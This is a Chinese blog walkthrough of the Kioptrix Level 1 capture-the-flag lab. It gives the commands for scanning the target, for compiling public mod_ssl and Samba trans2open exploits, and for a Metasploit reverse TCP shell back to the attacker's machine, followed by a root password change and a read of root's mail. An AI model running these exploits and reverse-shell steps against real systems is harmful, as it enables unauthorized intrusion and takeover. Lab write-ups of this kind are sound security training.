Kioptrix-1

夫君子之行,静以修身,俭以养德,非淡泊无以明志,非宁静无以致远

00 环境准备

Kali(IP:10.10.16.128)
Kioptrix 靶机
NAT 网络连接

01 主机发现

nmap -sP 10.10.16.0/24

在这里插入图片描述

02 端口扫描

nmap -A -v -sS -sP -p- -T4 10.10.16.152

得到开放的端口:22,80,111,139,443,1024,并得到在对应端口下使用的软件(mod_ssl/samba)。
通过端口扫描得知 apache-1.3.20,openssl-0.9.6b,mod_ssl-2.8.4(老版,谷歌搜索漏洞)
对于端口使用的插件,在下面将专门对其进行漏洞挖掘
在这里插入图片描述

03 目录扫描

dirb http://10.10.16.152

对 dirb 爬行的目录进行访问,没有发现可利用的价值。
在这里插入图片描述

04 漏洞挖掘

nikto -h 10.10.16.152

使用 nikto 进行 web 扫描发现几处可利用漏洞。
在这里插入图片描述
可以使用在线漏洞数据库搜索相对应的版本漏洞

https://www.exploit-db.com/search

在这里插入图片描述

05 漏洞利用

0x01 mod_ssl ( remote buffer overflow )

使用 Kali 自带的漏洞查找工具查找本地所有漏洞和 shellcode

searchsploit mod_ssl

ps: 如果使用 764.c 脚本的话,应为该脚本版本太老,所以还需对其内容进行修改,有点麻烦,这里直接使用 47080.c 脚本。
764.c 修改

在桌面新建一个 Kioptrix 文件夹,将 47080.c 文件拷贝过去,查看文件头得知文件的使用方法:要先安装 libssl-dev 库才能编译文件。

cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
head 47080.c
sudo apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto

在这里插入图片描述
编译之后运行生成的二进制文件,发现使用该二进制文件的方法。
在这里插入图片描述
由于该靶机使用 apache-1.3.20,所以将 target 定位到 0x6a - 0x6b
在这里插入图片描述在这里插入图片描述

0x02 samba 2.2

① remote code excution

利用 msf 的 auxiliary/scanner/smb/smb_version 模块得知靶机使用 samba-2.2.1a

搜索 samba 2.2 的漏洞利用模块,发现最下方的 Remote Code Excution
在这里插入图片描述
将该模块下的脚本复制到自定义的文件夹里面,查看文件头,编译脚本。

cp /usr/share/exploitdb/exploits/multiple/remote/10.c .
head 10.c
gcc -o samba 10.c

在这里插入图片描述

./samba -b 0 10.10.16.152  # -b 0 是指 Linux 

在这里插入图片描述

② Remote Buffer Overflow

在这里插入图片描述

gcc -o call_trans2open 22469.c

在这里插入图片描述

./call_trans2open -t 10.10.16.152

在这里插入图片描述

③ 利用 msf

从上面 searchsploit 的结果来看,还有几个模块是关于 metasploit 的,因此可以利用 msf 来getshell 提权。

msfconsole
use exploit/linux/samba/trans2open

在这里插入图片描述
使用 show options 查看要添加什么参数
在这里插入图片描述
使用该模块下的一个 payload

set payload linux/x86/shell_reverse_tcp

在这里插入图片描述

set rhosts 10.10.16.152
set lhost 10.10.16.128
exploit

在这里插入图片描述
ps: 使用 python -v 查看当前 python 版本是 python 1.5 ,所以不能使用 python -c ‘import pty;pty.spawn("/bin/bash");’ ,可以使用 passwd 可以改变 root 密码,然后通过 ssh 登录 root 账户获取完全交互式 shell。
在这里插入图片描述

0x03 capture the flag

cat /var/mail/root

在这里插入图片描述

                                                                                                                                                                    猪头
                                                                                                                                                                 2020.3.15
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值